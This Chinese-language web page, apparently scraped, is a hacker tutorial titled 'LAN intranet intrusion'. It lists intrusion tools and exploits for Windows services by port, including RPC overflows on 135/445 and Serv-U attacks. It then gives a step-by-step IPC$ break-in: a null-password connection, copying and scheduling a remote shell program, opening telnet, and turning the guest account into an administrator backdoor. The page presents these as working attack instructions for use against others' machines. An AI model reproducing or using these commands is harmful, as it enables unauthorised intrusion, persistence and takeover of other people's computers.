當前位置:成語大全網 - 新華字典 - 局域網內網入侵

局域網內網入侵

我查拉135端口端口說明:135端口主要用於使用RPC(Remote Procedure Call,遠程過程調用)協議並提供DCOM(分布式組件對象模型)服務,通過RPC可以保證在壹臺計算機上運行的程序可以順利地執行遠程計算機上的代碼;使用DCOM可以通過網絡直接進行通信,能夠跨包括HTTP協議在內的多種網絡傳輸。

端口漏洞:相信去年很多Windows 2000和Windows XP用戶都中了“沖擊波”病毒,該病毒就是利用RPC漏洞來攻擊計算機的。RPC本身在處理通過TCP/IP的消息交換部分有壹個漏洞,該漏洞是由於錯誤地處理格式不正確的消息造成的。該漏洞會影響到RPC與DCOM之間的壹個接口,該接口偵聽的端口就是135。

1:用139端口入侵

我們先確定壹臺存在139端口漏洞的主機。用掃描工具掃描!比如SUPERSCAN這個端口掃描工具。假設現在我們已經得到壹臺存在139端口漏洞的主機,我們要使用nbtstat -a IP這個命令得到用戶的情況!現在我們要做的是與對方計算機進行***享資源的連接。

用到兩個NET命令,下面就是這兩個命令的使用方法

NET VIEW?

作 用:顯示域列表、計算機列表或指定計算機的***享資源列表。?

命令格式:net view [\\computername | /domain[:domainname]]?

參數介紹:?

<1>鍵入不帶參數的net view顯示當前域的計算機列表。?

<2>\\computername 指定要查看其***享資源的計算機。?

<3>/domain[:domainname]指定要查看其可用計算機的域?

NET USE?

作用:連接計算機或斷開計算機與***享資源的連接,或顯示計算機的連接信息。?

命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?

[password | *]] [/user:[domainname\]username] [[/delete] |?

[/persistent:{yes | no}]]?

參數介紹:?

鍵入不帶參數的net use列出網絡連接。?

devicename指定要連接到的資源名稱或要斷開的設備名稱。?

\\computername\sharename服務器及***享資源的名稱。?

password訪問***享資源的密碼。?

*提示鍵入密碼。 /user指定進行連接的另外壹個用戶。?

domainname指定另壹個域。?

username指定登錄的用戶名。?

/home將用戶連接到其宿主目錄?

/delete取消指定網絡連接。?

/persistent控制永久網絡連接的使用。?

C:\net use \\IP

C:\net view \\IP

我們已經看到對方***享了他的C,D,E三個盤

我們要做的是使用NBTSTAT命令載入NBT快取.

c:\>nbtstat –R 載入NBT快取

c:\>nbtstat –c 看有無載入NBT快取

現在我們已經得到的139端口漏洞的主機IP地址和用戶名,現在就該是我們進入他計算的時候了,點擊開始---查找--計算機,將剛才找到的主機名字輸入到上面,選擇查找,就可以找到這臺電腦了!雙擊就可以進入,其使用的方法和網上領居的壹樣。

2:4899端口入侵

用4899過濾器.exe,掃描空口令的機器

3:80入侵

對sp3以前的機器,可以用webdav入侵;

對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL進行註入。(啊D的註入軟件)。

4:serv-u入侵(21端口)

對5. 004及以下系統,可用溢出入侵。(serv5004.exe)

對5.1.0.0及以下系統,可用本地提升權限。(servlocal.exe)

對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)

輸入壹個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼

5: 554端口

用real554.exe入侵。

6:6129端口

用DameWare6129.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系統漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

進行溢出入侵。

9. 3127等端口

可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵

利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。

經典IPC$入侵

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

這是用"流光"掃到的用戶名是administrators,密碼為"空"的IP地址(氣好到家如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立壹個連

接,因為密碼為"空",所以第壹個引號處就不用輸入,後面壹個雙引號裏的是用戶名

,輸入administrators,命令即可成功完成。

2. C:\>copy srv.exe \\127.0.0.1\admin$

先復制srv.exe上去,在流光的Tools目錄下就有(這裏的$是指admin用戶的

c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看妳要復制到什麽地方去了)。

3. C:\>net time \\127.0.0.1

查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe

用at命令啟動srv.exe吧(這裏設置的時間要比主機時間快,不然妳怎麽啟動啊.

5. C:\>net time \\127.0.0.1

再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備

開始下面的命令。

6. C:\>telnet 127.0.0.1 99

這裏會用到Telnet命令吧,註意端口是99。Telnet默認的是23端口,但是我們使用的

是SRV在對方計算機中為我們建立壹個99端口的Shell。

雖然我們可以Telnet上去了,但是SRV是壹次性的,下次登錄還要再激活!所以我們打

算建立壹個Telnet服務!這就要用到ntlm了

7.C:\>copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。

8. C:\WINNT\system32>ntlm

輸入ntlm啟動(這裏的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這

個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使

用"net start telnet"來開啟Telnet服務!

9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作

壹樣簡單!(然後妳想做什麽?想做什麽就做什麽吧,哈哈)

為了以防萬壹,我們再把guest激活加到管理組

10. C:\>net user guest /active:yes

將對方的Guest用戶激活

11. C:\>net user guest 1234

將Guest的密碼改為1234,或者妳要設定的密碼

12. C:\>net localgroup administrators guest /add

將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我

們可以用guest再次訪問這臺計算機)

/p?w=各個端口的入侵.%20&k=5lala&aid=B0100019074

不算太復雜的!